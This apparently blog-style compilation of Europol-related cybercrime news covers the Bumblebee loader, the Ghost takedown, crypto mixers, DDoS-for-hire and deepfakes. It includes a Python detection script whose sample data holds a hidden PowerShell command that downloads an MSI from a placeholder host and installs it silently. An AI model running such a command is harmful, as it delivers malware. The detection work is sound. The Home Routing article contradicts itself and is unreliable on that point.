
Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

The Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by the TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.
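As an added illustration (not code from the original post, Netskope, or Europol), the following Python detection logic flags the delivery chain described above in process-creation telemetry: PowerShell spawned by explorer.exe (the opened .LNK) that downloads an .msi, followed by a silent msiexec run spawned by that PowerShell. The event format and sample events are constructed, and the explorer.exe parent is an assumption about how the shortcut gets launched.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 records.
# They are not Netskope's or Europol's telemetry; pids and paths are made up.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # The user opens the .LNK from the phishing ZIP: explorer spawns PowerShell,
    # which fetches an MSI posing as an NVIDIA driver update and runs it silently.
    {"pid": 4212, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell.exe -w hidden -c "iwr http://update.example.invalid/'
                 'nvidia_update.msi -OutFile $env:TEMP\\nv.msi; '
                 'msiexec /i $env:TEMP\\nv.msi /qn"')},
    {"pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\u\AppData\Local\Temp\nv.msi /qn"},
    # Benign: an interactive MSI install started from explorer (no PowerShell parent).
    {"pid": 5000, "ppid": 4100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\u\Downloads\7zip.msi"},
    # Benign: a scheduled PowerShell script with no download and no MSI.
    {"pid": 5100, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download primitives commonly seen in shortcut-launched PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.I)
MSI_RE = re.compile(r"\.msi\b", re.I)
# msiexec run with a quiet/no-UI switch, i.e. the "executed silently" step.
SILENT_MSI_RE = re.compile(r"msiexec.*?(/qn\b|/qb\b|/quiet\b|/q\b)", re.I)


def _basename(path):
    """Lower-cased file name of a Windows (or POSIX) image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_stages(events):
    """Return [(pid, stage)] for events matching either stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = _basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        # Stage 1: explorer (the double-clicked .LNK) -> PowerShell that fetches an .msi
        if (name in POWERSHELL and pname == "explorer.exe"
                and DOWNLOAD_RE.search(cmd) and MSI_RE.search(cmd)):
            hits.append((e["pid"], "stage1: explorer-spawned PowerShell fetching an MSI"))
        # Stage 2: that PowerShell -> msiexec with a silent switch
        elif name == "msiexec.exe" and pname in POWERSHELL and SILENT_MSI_RE.search(cmd):
            hits.append((e["pid"], "stage2: silent msiexec spawned by PowerShell"))
    return hits


def link_chains(events):
    """Pair each stage-2 msiexec with the stage-1 PowerShell that spawned it.

    A linked pair is a much stronger signal than either stage alone, since
    admins also run msiexec quietly and scripts also download files."""
    stages = dict(detect_stages(events))
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for pid, stage in stages.items():
        if stage.startswith("stage2"):
            ppid = by_pid[pid]["ppid"]
            if stages.get(ppid, "").startswith("stage1"):
                chains.append((ppid, pid))
    return chains


if __name__ == "__main__":
    for pid, stage in detect_stages(SAMPLE_EVENTS):
        print(pid, stage)
    print("full chains (powershell_pid, msiexec_pid):", link_chains(SAMPLE_EVENTS))
```

Only the two constructed malicious events are flagged, and only they link into a complete chain; the interactive MSI install and the backup script stay silent.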

Global Taskforce Dismantles Encrypted Criminal Platform 'Ghost,' Leading to 51 Arrests

In a major breakthrough, Ireland's police service, An Garda Síochána, collaborated with Europol and law enforcement from eight other countries to dismantle a sophisticated criminal platform known as 'Ghost.' This encrypted platform was widely used for large-scale drug trafficking, money laundering, and other serious criminal activities. So far, the coordinated operation has led to the arrest of 51 individuals, including 38 in Australia and 11 in Ireland, and is seen as a critical step toward disrupting international organized crime.

Ghost’s advanced encryption capabilities allowed criminals to communicate without fear of detection, handling approximately 1,000 messages daily. It even featured self-destruct options to erase messages, offering a high level of secrecy for criminal enterprises. During the investigation, Irish authorities seized 42 encrypted devices and over €15 million worth of drugs, such as cocaine, cannabis, and heroin, linking the platform to at least four criminal gangs operating within Ireland. The platform’s dismantling is part of a more extensive, ongoing investigation into organized crime that relies on encrypted communication networks to conduct illegal operations. 

Europol’s executive director, Catherine De Bolle, emphasized the importance of international collaboration in this operation, noting that the joint effort from various countries was crucial in dismantling a system that many criminals considered impenetrable. She stated that such coordinated action demonstrates that law enforcement can penetrate even the most secure networks when they work together. This operation marks a significant achievement in disrupting illegal activities facilitated by encrypted platforms, proving that even the most advanced criminal networks cannot hide from justice. 

Despite this victory, authorities remain cautious, acknowledging that shutting down criminal platforms like Ghost is just one step in the fight against organized crime. Similar cases, such as the resurgence of the LockBit ransomware gang, serve as reminders that criminals often adapt quickly, finding new ways to operate. This operation, however, is a testament to the effectiveness of global cooperation and advanced investigative techniques, sending a strong message to criminal networks that no platform, regardless of its sophistication, is beyond the reach of law enforcement. 

As investigations continue, Europol anticipates more arrests and the unearthing of additional criminal activities associated with Ghost. This case highlights the ongoing need for international collaboration, technological expertise, and persistent efforts to dismantle organized crime networks.

Mobile Encryption Innovation Aids Criminals, Europol Reports

Europol has proposed solutions to the challenges that privacy-enhancing technologies in Home Routing pose for law enforcement agencies trying to intercept communications during criminal investigations. In an earlier report in its Digital Challenges series, the agency discussed the difficulty of gathering admissible evidence during investigations because of end-to-end encryption on communication platforms.

Home Routing is the name given to a system used by telecommunications companies to route a customer's traffic (calls, messages, and internet data) through their home network even when they are away from home. A new report published by the EU Innovation Hub for Internal Security examines how citizens' privacy can be upheld while criminal investigations and prosecutions are still facilitated.

There is no doubt that encryption is one of the most important means of protecting private communications. At the same time, it allows threat actors to remain hidden from law enforcement while carrying out their malicious activities. Companies must understand the needs, challenges, and priorities of stakeholders within the Justice and Home Affairs (JHA) community in order to take the measures needed to preserve the fundamental rights of European citizens while maintaining a safe environment.

The privacy-enhancing technologies (PETs) that can be applied in Home Routing support data encryption at the service level: devices subscribed to the home network exchange session-based keys with the provider. When the home network provider uses PET, all traffic remains encrypted, because the key is inaccessible to both the home network's backend and the visited network, which acts only as a forwarder. This setup prevents authorities from obtaining evidence through local Internet service providers (ISPs) as part of lawful interception.

With Home Routing in place, a suspect using a foreign SIM card can no longer be intercepted once the technology is deployed, the European agency says in a press release. Police forces may then have to rely on the cooperation of foreign service providers or issue a European Investigation Order (EIO), which can take significantly longer than an investigation normally allows, especially where emergency interceptions are required; in most cases, a reply to an EIO can take up to four months.

Criminals are aware of this loophole and are exploiting it to avoid being caught by law enforcement in their respective countries, the European agency summarises. The European Union's law enforcement agency is therefore appealing to stakeholders to consider two possible solutions that would eliminate the delays and procedural friction associated with lawful interception of communications.

The first variant under consideration is an EU regulation that disables PET in the Home Routing protocol. Domestic service providers would then be able to intercept calls made by individuals using foreign SIM cards, without having to share information about the person of interest with outside parties. A spokesperson for the agency said that with this solution, roaming subscribers as well as local subscribers would benefit from the same level of encryption as communication through a national SIM card.

However, subscribers abroad would not benefit from the added encryption of their home country that is included in their subscription package. The second proposal is a cross-border mechanism that lets law enforcement agencies within the European Union issue interception requests that service providers handle promptly. Europol has thus identified two potential solutions to the challenges that Home Routing and mobile encryption pose for criminal investigations.

The first solution allows Privacy-Enhancing Technologies (PET) to be enabled for all users; however, it could result in a service provider in another EU member state learning about individuals of interest in an investigation, which may not be desirable. The second involves establishing a mechanism for rapidly processing interception requests from service providers in other EU member states. Europol emphasises that these two solutions are merely possible avenues for safeguarding and maintaining existing investigatory powers.

The agency's goal is to highlight the impact that Home Routing encryption has on investigations, urging national authorities, legislatures, and telecommunications service providers to collaborate in finding a viable solution to this problem.

Europol Confirms Web Portal Breach: No Operational Data Stolen

In a recent incident, Europol’s Europol Platform for Experts (EPE) portal experienced a security breach. The breach occurred within a closed user group, raising concerns about data security and operational integrity. In this blog post, we delve into the details of the breach, Europol’s response, and the implications for law enforcement agencies. 

The breach 

On September 6, 2023, Europol confirmed that its EPE portal had been compromised. However, the good news is that no operational data was stolen. The breach was limited to a specific user group, and Europol assured the public that core systems remained unaffected. This incident highlights the importance of robust security measures, even within restricted environments. 

EPE portal overview

The Europol Platform for Experts serves as a collaborative hub for law enforcement agencies, allowing experts to share information, collaborate on cases, and access relevant resources. It plays a crucial role in combating transnational crime, terrorism, and cyber threats. Given its sensitive nature, any breach raises concerns about the security of shared data and the potential impact on ongoing investigations. 

Europol’s response

Europol promptly detected the breach and took immediate action. While the compromised user group faced unauthorized access, Europol’s cybersecurity team swiftly contained the incident. The agency’s transparency in acknowledging the breach and providing timely updates demonstrates its commitment to maintaining public trust. 

What have we learned? 

  • Segmentation Matters: The breach’s limited scope underscores the importance of network segmentation. By isolating user groups, organizations can minimize the impact of security incidents. 
  • Continuous Monitoring: Regular security audits and monitoring are essential. Europol’s vigilance allowed them to detect the breach promptly. 
  • User Training: Educating users about security best practices is crucial. Even within closed groups, human error can lead to vulnerabilities.

Cracking Down on Crime: Europol Shares Data on Europe's Top Threats

There has been a considerable increase in serious organized crime over the past few years, and it continues to pose a significant threat to the EU's internal security. The most threatening criminal networks operating in and affecting the EU need to be clearly understood by law enforcement and policymakers if they are to effectively prioritise resources and guide policy action. 

Certain traits make successful companies agile and resilient: they anticipate trends and pivot to new environments rapidly while keeping their operations running. A report Europol released on Friday indicates that the most threatening criminal networks across the EU are equipped with the same skills.

Europol presented a report today (April 5) detailing the state of crime in Europe, flagging 821 criminal networks operating within EU territory as the most dangerous. Making the invisible visible so that we can know, fight, and defeat it. To produce the report, we consulted law enforcement agencies from 27 member countries as well as 17 other states, which provided information and participated.

As Europol points out, some key characteristics distinguish the 821 most threatening criminal networks: they are agile, able to adapt their business processes in a short time and achieve economies of scale, and they overcome the obstacles that law enforcement puts in their way.

Although their activities often remain concentrated in a single country, criminal networks are borderless: they operate across EU and non-EU countries without significant difficulty. They are controlling: they maintain tight oversight of everything within the organization, and they generally specialize in a specific criminal activity. The 821 networks also cause significant damage to internal security through corruption.

According to Europol's report, 50 per cent of the most dangerous criminal networks are involved in drug trafficking; for 36 per cent of those networks, drug trafficking is their sole business. A total of 15 per cent of the organizations deal exclusively in fraud, while the remaining 6 per cent deal in human trafficking.

On the drug side, beyond heroin, cannabis, and cocaine, there is concern about the arrival on the European market of new substances such as fentanyl, which has already caused thousands of deaths in the United States and has reached a critical point there. Recent months have seen massive shipments of drugs hidden in bananas shipped throughout Europe.

In February, a banana shipment in the British Isles was found to contain more than 12,500 pounds of cocaine, the largest single drug seizure in British history. In August of last year, customs agents in the Netherlands discovered 17,600 pounds of cocaine hidden inside banana crates at the port of Rotterdam.

Three months earlier, in the Italian port of Gioia Tauro, a police dog sniffed out 3 tons of cocaine hidden in a consignment of bananas. Of the top ten criminal groups identified, nine specialize in cybercrime; these organizations, mainly run by Russians and Ukrainians, are active in France, Germany, Switzerland and the U.S.

They have up to 100 members, but a core of criminals is responsible for distributing ransomware to affiliates who then conduct the cyberattacks. The core group manages the negotiation and payment of ransoms, often in cryptocurrency, and usually pays affiliates 80% of the fee for carrying out an attack.

Service providers give criminal networks crucial support by taking part in fraud schemes and supplying cyber services and technology solutions. The methods used in these campaigns include mass mailings and phishing campaigns, fake websites, fake advertisements and fake social media accounts.

According to Europol, such providers have also supported online fraud schemes and advised on moving cryptocurrency online. Criminal networks also use countermeasures, such as encrypted telephones, to avoid detection by law enforcement; others avoid electronic devices in all forms of communication and meet in person instead, so as to leave no digital footprint of their activities.

A report released by the European Commission stated that drug trafficking continues to stand out as the most significant activity in the EU countries and is witnessing record seizures of cocaine in Europe, as well as an increase in violent crimes linked to drugs, such as in Belgium and France.  

Half of the most dangerous networks in the criminal world are involved in drug trafficking in some form or another, whether on their own or as part of their overall portfolio. According to the report, more than 70% of networks engage in corruption "to facilitate criminal activity or obstruct law enforcement or judicial processes", and "68% of networks use violence as an inherent element of their approach to conduct business," which is consistent with their criminal or nefarious activities.

It has been reported that gang violence has been rife in Antwerp for decades as the city serves as the main entry point for Latin American cocaine cartels into the European continent. Federal authorities say that drug trafficking is rapidly affecting society as a result of an increase in drug use throughout the whole country. 

According to Ylva Johansson, EU Commissioner for Home Affairs, organised crime is one of the biggest threats facing society today, threatening it with corruption and extreme violence. During a press conference, Europol explained that the data it collected would be shared with law enforcement agencies in EU countries, which should help them better target criminals.

Sensitive Documents Vanish Under Mysterious Circumstances from Europol Headquarters

A significant security breach has impacted the European Union's law enforcement agency, Europol, according to a report by Politico. Last summer, a collection of highly confidential documents containing personal information about prominent Europol figures vanished under mysterious circumstances.

The missing files, which included sensitive data concerning top law enforcement officials such as Europol Executive Director Catherine De Bolle, were stored securely at Europol's headquarters in The Hague. An ongoing investigation was launched by European authorities following the discovery of the breach.

An internal communication dated September 18, revealed that Europol's management was alerted to the disappearance of personal paper files belonging to several staff members on September 6, 2023. Subsequent checks uncovered additional missing files, prompting serious concerns regarding data security and privacy.

Europol took immediate steps to notify the individuals affected by the breach, as well as the European Data Protection Supervisor (EDPS). The incident poses significant risks not only to the individuals whose information was compromised but also to the agency's operations and ongoing investigations.

Adding to the gravity of the situation, Politico's report highlighted the unsettling discovery of some of the missing files by a member of the public in a public location in The Hague. However, key details surrounding the duration of the files' absence and the cause of the breach remain unclear.

Among the missing files were those belonging to Europol's top executives, including Catherine De Bolle and three deputy directors. These files contained a wealth of sensitive information, including human resources data.

In response to the breach, Europol took action against the agency's head of Human Resources, Massimiliano Bettin, placing him on administrative leave. Politico suggests that internal conflicts within the agency may have motivated the breach, speculating on potential motives for targeting Bettin specifically.

The security breach at Europol raises serious concerns about data protection and organizational security measures within the agency, prompting an urgent need for further investigation and safeguards to prevent future incidents.

Europol Dismantles Ukrainian Ransomware Gang

A well-known ransomware organization operating in Ukraine has been successfully taken down by an international team under the direction of Europol, marking a major win against cybercrime. In this operation, the criminal group behind several high-profile attacks was the target of multiple raids.

The joint effort, which included law enforcement agencies from various countries, highlights the growing need for global cooperation in combating cyber threats. The dismantled group had been a prominent player in the world of ransomware, utilizing sophisticated techniques to extort individuals and organizations.

The operation comes at a crucial time, with Ukraine already facing challenges due to ongoing geopolitical tensions. Europol's involvement underscores the commitment of the international community to address cyber threats regardless of the geopolitical landscape.

One of the key events leading to the takedown was a series of coordinated raids across Ukraine. These actions, supported by Europol, aimed at disrupting the ransomware gang's infrastructure and apprehending key individuals involved in the criminal activities. The raids not only targeted the group's operational base but also sought to gather crucial evidence for further investigations.

Europol, in a statement, emphasized the significance of international collaboration in combating cybercrime. "This successful operation demonstrates the power of coordinated efforts in tackling transnational threats. Cybercriminals operate globally, and law enforcement must respond with a united front," stated the Europol representative.

The dismantled ransomware gang was reportedly using the Lockergoga ransomware variant, known for its sophisticated encryption methods and targeted attacks on high-profile victims. The group's activities had raised concerns globally, making its takedown a priority for law enforcement agencies.

In the aftermath of the operation, cybersecurity experts are optimistic about the potential impact on reducing ransomware threats. However, they also stress the importance of continued vigilance and collaboration to stay ahead of evolving cyber threats.

As the international community celebrates this successful operation, it serves as a reminder of the ongoing battle against cybercrime. The events leading to the dismantlement of the Ukrainian-based ransomware gang underscore the necessity for countries to pool their resources and expertise to protect individuals, businesses, and critical infrastructure from the ever-evolving landscape of cyber threats.

Group Behind Ragnar Locker Ransomware Debunked

International law enforcement organizations have effectively dismantled the renowned Ragnar Locker ransomware gang, marking a huge win against cybercrime. This operation shows the value of international cooperation in the fight against digital criminal businesses and represents a turning point in the ongoing war against cyber threats.

The Ragnar Locker gang had been a formidable force in the realm of cyber extortion, targeting businesses worldwide with their sophisticated ransomware attacks. Their modus operandi involved encrypting sensitive data and demanding hefty ransoms for its release, often crippling the operations of affected organizations. 

The takedown operation was a joint effort between various agencies, including the European Union Agency for Law Enforcement Cooperation (Europol), the Federal Bureau of Investigation (FBI), and the UK's National Crime Agency (NCA). It was a testament to the power of international cooperation in combating cybercrime.

Europol, in a statement, emphasized the significance of this operation, stating, "The arrest of the alleged leader and the seizure of the infrastructure used by the group to conduct its malicious activities is a clear signal that Europol and its partners are actively targeting ransomware groups, their infrastructure, and the financial proceeds they extract from their victims."

One of the key achievements of this operation was the seizure of the Ragnar Locker gang's dark web portal, where they conducted their extortion activities. This move has disrupted their ability to continue their illegal operations and sends a powerful message to other cybercriminals.

The impact of this takedown is expected to be far-reaching. With the dismantling of Ragnar Locker's infrastructure, countless potential victims have been spared from falling prey to their malicious activities. This operation serves as a stark reminder to cybercriminals that the global community is united in its determination to combat cyber threats.

However, it is crucial to remain vigilant in the face of evolving cyber threats. As the digital landscape continues to evolve, criminals may adapt their tactics. Organizations and individuals alike must prioritize cybersecurity measures, including robust antivirus software, regular backups, and employee training to recognize and respond to potential threats.

An important step forward in the battle against cybercrime was made with the successful operation against the Ragnar Locker ransomware organization. It demonstrates the value of global cooperation and makes it quite obvious that cybercriminals will be hunted down and made to answer for their deeds. While this win deserves praise, it also highlights the necessity of ongoing watchfulness and investment in cybersecurity measures to guard against potential attacks.


Europol Warns of a Potent Criminal Economy Fostered by New Technological Tools

Europol's inaugural report on financial and economic crime highlights the alarming extent to which money laundering techniques employed by ransomware groups and cryptocurrency scammers are now cleaning the cash of nearly 70% of the world's organized crime networks.

Despite concerted efforts by international law enforcement agencies to combat cybercrime, progress has been sluggish, resulting in European criminals reaping profits of up to €188 billion.

The report underscores how advancements in fintech are exacerbating financial malfeasance. The widespread adoption of online banking and digital-only 'neo banks' has led to disproportionately high rates of financial fraud and money laundering. Innovations like virtual international bank account numbers (IBAN) and 'buy now pay later' financing have further fueled online fraud.

Europol also points out that encrypted messaging apps, dark web marketplaces, cryptocurrencies, and other privacy-enhancing technologies shield criminals' identities, presenting significant challenges for law enforcement agencies. Criminals can now easily access illicit digital products and technical services, even without advanced technological skills, thanks to a burgeoning "crime-as-a-service" model.

The report highlights how money laundering has become increasingly streamlined with the emergence of new types of digital assets. Professional money launderers have established a parallel underground financial system that processes transactions away from the watchful eye of legal financial mechanisms. 

High-level money brokers play a pivotal role in this criminal ecosystem, providing a range of unregulated global banking and escrow services to numerous criminal organizations. This facilitates the laundering of billions of euros worth of illicit profits annually through the EU, rendering money laundering a significant criminal threat.

Europol underscores that most countries lack the requisite experience and specialized expertise needed for tracing cash, analyzing blockchain data, establishing actual ownership, managing seized assets, and facilitating recovery. Digital assets held outside of financial institutions pose an even greater challenge in terms of tracing, seizure, and confiscation.

“Organised crime has built a parallel global criminal economy around money laundering, illicit financial transfers and corruption,” explained Europol’s executive director, Catherine De Bolle. “With modern technology, they have diversified their modi operandi to evade detection.”

Ukrainian Police Arrests Suspects Accused of Stealing $4.3M From Victims Across Europe

The Ukrainian police have detained 10 suspects, arresting two of them, for allegedly being involved in a cybercrime group that ran phishing campaigns and fraudulent online marketplaces, stealing more than $4.3 million from over 1,000 users across Europe.

According to Ukraine’s cyber police unit, which collaborated with Czech Republic law enforcement on the bust, the threat group created more than 100 phishing sites to acquire victims’ bank credentials and access to their accounts. 

These websites offered a range of products at discounts from market value. But instead of getting a good price, customers who entered their bank card details to pay for the fraudulent products had their account information stolen and, in all likelihood, their money as well.

Additionally, the scammers set up two call centers in Ukraine, in Vinnytsia and Lviv, and employed operators to persuade clients to make purchases as part of the scam. Too bad they were not helping to defend their country instead of taking advantage of people. According to the police report, the victims include individuals from several European countries, such as the Czech Republic, France, Spain, and Portugal. The threat group scammed the victims out of 160 million hryvnias or more, i.e. nearly $4.36 million.

Following the arrests, the Ukrainian police also shared a video in which officers are seen breaking down the door of a suspect's residence and entering an empty call center.

The law enforcement teams searched the houses, cars, and two call centers of the accused in a total of around 30 searches, seizing mobile phones, SIM cards, and computer hardware involved in illicit activity. 

The two suspected heads of the crime gang face up to 12 years in prison on charges of fraud and establishing a criminal organization. Ten more accused gang members have been captured in the European Union, and according to international law enforcement organizations, the investigation is still underway.

The arrests follow another call center scam in Europe announced by Europol in January this year, in which European police detained 15 suspects and shut down a multi-country network of call centers selling fake cryptocurrency that law enforcement said had stolen hundreds of millions of euros from victims.

ChipMixer: Cryptocurrency Mixer Taken Down After 'Laundering $3bn in Cryptocurrency'

The darknet cryptocurrency mixer ChipMixer has been shut down following a sting conducted by Europol, the FBI, and German police, which investigated servers and internet domains and seized $46 million worth of cryptocurrency.

During the raid, investigators found digital currency in wallets connected to North Korean cybercriminals and Russian intelligence services.

US prosecutors have charged a Vietnamese man they say has run the service since its creation in August 2017. Mixers gather potentially tainted funds and send them at random to destination wallets.

Minh Quoc Nguyen, 49, of Hanoi has been charged with money laundering, operating an unlicensed money-transmitting business, and identity theft. The FBI has added him to its wanted list. 

The service's customers included criminals who laundered more than $700 million in bitcoin from wallets identified as holding stolen funds, including money taken by North Korean hackers from Axie Infinity's Ronin Bridge and Harmony's Horizon Bridge. 

It has also been reported that APT28, the Russian military intelligence hacking group also known as Fancy Bear, used ChipMixer to buy infrastructure for the Kremlin's Drovorub malware. Moreover, according to Europol, the Russian RaaS group LockBit was also a patron. 

ChipMixer joins a relatively small group of crypto mixers that have been shut down or sanctioned for enabling criminals to conceal the source of illegally obtained cryptocurrency. The list currently includes Blender.io, which was probably renamed and relaunched as Sinbad, and Tornado Cash, a favorite of cybercriminals that helped hackers launder more than $7 billion between 2019 and 2022. 

The Federal Criminal Police Office of Germany seized two ChipMixer back-end servers and more than $46 million in cryptocurrency, while American investigators seized two web domains that pointed to the service. 

According to court documents, ChipMixer allowed users to deposit Bitcoin, which was then combined with Bitcoin from other users to anonymize the currency. But this mixer took things a step further by converting the deposited money into small tokens of equal value called "chips," which were then combined, further anonymizing the funds and obscuring their blockchain trails. This feature of the platform is what attracted so many criminals. 

The domain now displays a seizure notice, stating: “This domain has been seized by the FBI in accordance with a seizure warrant.” 

“Together, with our international partners, we are firmly committed to identifying and investigating cybercriminals who pose a serious threat to our economic security by laundering billions of dollars’ worth of cryptocurrency under the misguided anonymity of the darknet,” said Scott Brown, special agent in charge of Homeland Security Investigations (HSI) Arizona.  

DDoS-for-Hire Websites are Seized by Authorities

 

According to Europol, international police took down roughly 50 well-known websites that charged users to perform distributed denial-of-service (DDoS) attacks and detained seven people who were allegedly the sites' administrators.

Operation Power Off was a coordinated effort by law enforcement agencies in the US, the UK, the Netherlands, Poland, and Germany to combat attacks that can knock websites and networks offline.

According to the police, the defendants misrepresented their websites as network-testing services while actually charging users for DDoS attacks against universities, government organizations, gaming platforms, and millions of people both domestically and overseas. DDoS attacks render websites unavailable by flooding them with unwanted traffic.

"These DDoS-for-hire websites, with paying customers both inside and outside the US, enabled network outages on a massive scale, targeting millions of victim computers around the world," said Antony Jung, special agent in charge of the operation at the FBI's field office in Anchorage, Alaska. He warned prospective users and administrators to think carefully before purchasing or offering these illicit services.

The seized sites included some of the largest DDoS-for-hire services, according to the UK's National Crime Agency (NCA), one of which had been used to launch more than 30 million attacks over its lifetime. The NCA has also taken possession of customer data and, pending examination, may take legal action against UK users of the sites.

DDoS Attacks Are Illegal

DDoS-for-hire services lower the barrier to entry for cybercrime. According to Europol, anyone with no technical expertise can launch a DDoS attack at the press of a button for as little as $10, taking down entire networks and websites.

The harm they can cause to victims can be severe, financially crippling businesses and depriving people of essential services provided by banks, government agencies, and law enforcement. Many young IT enthusiasts take part in this supposedly low-level crime, emboldened by their imagined anonymity and unaware of the potential repercussions of such online activity.

The police take DDoS attacks seriously. Law enforcement monitors all users regardless of scale, whether they are high-level hackers launching DDoS attacks against for-profit targets or casual users kicking their rivals out of video games.


According to Europol, Deepfakes are Used Frequently in Organized Crime

 

The Europol Innovation Lab recently released its inaugural report, titled "Facing reality? Law enforcement and the challenge of deepfakes", as part of its Observatory function. Based on extensive desk research and in-depth engagement with law enforcement specialists, the paper presents a full overview of the illegal use of deepfake technology and the obstacles law enforcement faces in identifying and preventing its malicious use. 

Deepfakes are audio and audio-visual content that "convincingly show individuals expressing or doing activities they never did, or build personalities which never existed in the first place" using artificial intelligence. According to the study, deepfakes are being used for malicious purposes in three important areas: disinformation, non-consensual pornography, and document fraud. As the technology advances, such attacks are predicted to become more realistic and more dangerous.

  1. Disinformation: Europol provided several examples of how deepfakes could be used to distribute false information, with potentially disastrous results. In the geopolitical domain, for example, a fake emergency broadcast could warn of an imminent attack. In February, just before the crisis between Russia and Ukraine erupted, the US accused the Kremlin of planning a disinformation scheme to use as a pretext for an invasion of Ukraine. The technique may also be used against corporations, for example by constructing a video or audio deepfake that makes it appear as if a company's leader engaged in contentious or unlawful conduct. Criminals imitating the voice of the top executive of an energy firm robbed the company of $243,000. 
  2. Non-consensual pornography: According to the analysis, Sensity found non-consensual pornography in 96 percent of deepfake videos. This usually entails superimposing a victim's face onto the body of a pornographic performer, giving the impression that the victim is performing the act.
  3. Document fraud: While current fraud protection techniques are making it harder to fake passports, the report stated that "synthetic media and digitally modified facial photos present a new way for document fraud." These technologies can, for example, mix or morph the faces of the person who owns the passport and the person who wants to obtain one illegally, increasing the likelihood that the photo will pass screening, including automated screening. 

Deepfakes might also harm the court system, according to the paper, by artificially manipulating or producing media to show or deny someone's guilt. In a recent child custody dispute, a mother edited an audio recording of her husband to persuade the court that he was abusive to her. 

Europol stated that all law enforcement organizations must acquire new skills and tools to deal properly with these types of threats. These include manual detection strategies, such as looking for inconsistencies, and automated detection techniques, such as AI-based deepfake detection software being developed by companies like Facebook and McAfee. 

It is quite conceivable that malicious threat actors will employ deepfake technology to support various crimes and run disinformation campaigns to influence or corrupt public opinion in the months and years ahead. Advances in machine learning and artificial intelligence will continue to improve the software used to make deepfakes.

Europol Dismantles Criminal Network Distributing Forged EU Travel Documents on Dark Web

 

The Spanish National Police and the French Border Police, in a joint operation coordinated by Europol, have busted an organized cybercrime gang involved in the procurement and distribution of forged travel and ID documents for migrant smugglers. 

During the raids, in which three house searches were carried out and a total of 17 people were arrested, police seized computers, smartphones, storage devices, counterfeit and genuine ID documents and photocopies of ID documents, labor certificates, administrative documents, payment cards, and cash. 

According to a press release published by the European Union's law enforcement agency, the organized criminal network distributed forged ID and travel documents in France, Germany, Italy, and Spain. 

“The documents were used by other criminals involved in the smuggling of migrants to the US, the UK and Ireland and other criminal activities (such as property crimes, trafficking in human beings, drug trafficking),” the Europol statement reads. “The criminal network was directly involved in migrant smuggling activities and logistical arrangements in return for payments starting at €8000 ($9000) per person.” 

The members of the criminal gang, mainly originating from Eastern European countries, apparently also operated in Georgia and Lithuania. According to Europol, cybercriminals mainly used dark web channels to distribute forged documents, including residence permits, vehicle registration documents, driver’s licenses, and travel documents focusing on French, Romanian, Georgian, Lithuanian, and Polish IDs. 

Additionally, the suspects used instant messaging apps and postal services to send the documents to their intended recipients. Messaging apps, presumably encrypted ones, were used by the group to collaborate and exchange images of documents, vehicles, and money transfer slips. Europol analysts said they linked some of this information to other ongoing investigations. 

Last year saw a gradual shift in the methods used by migrant smugglers and human traffickers. Digital technology is playing a major role in the operations of migrant smugglers, who have expanded their use of social media platforms and mobile applications to offer their illegal services.  

Human traffickers have exploited the anonymity of the internet to target vulnerable individuals and then exploit them via escort websites and even dating platforms. To counter this threat, Europol signed a working agreement with the UK's National Crime Agency (NCA) designed to formalize cooperation on this and other serious and organized crimes.

VPNLab.net Service was Seized Because it was Used by Criminals to Spread Ransomware

 

Following a coordinated worldwide police investigation, a VPN service used by criminals to spread ransomware and malware and to facilitate other forms of cybercrime has been knocked offline. The 15 servers used by the VPNLab.net service have been seized or disrupted in a joint operation by Europol, Germany's Hanover Police Department, the FBI, the UK's National Crime Agency (NCA), and others. 

According to Europol, VPNLab.net was founded in 2008 and provided services based on OpenVPN technology and 2048-bit encryption, offering online anonymity for as little as $60 per year. The service also offered a double VPN, with servers located in a variety of countries. "This made VPNLab.net a popular choice for cybercriminals, who could use its services to carry on committing their crimes without fear of detection by authorities," the agency said. 

According to Europol, several investigations have revealed criminals using the VPNLab.net service to support illegal operations such as malware distribution. Other incidents showed the service being used to set up infrastructure and communications for ransomware operations, as well as for the actual deployment of malware. Cybercriminals also used the service to spread malware while evading authorities. Now that the servers have been seized, law enforcement is reviewing customer data in an attempt to identify cybercriminals and victims of cyberattacks.

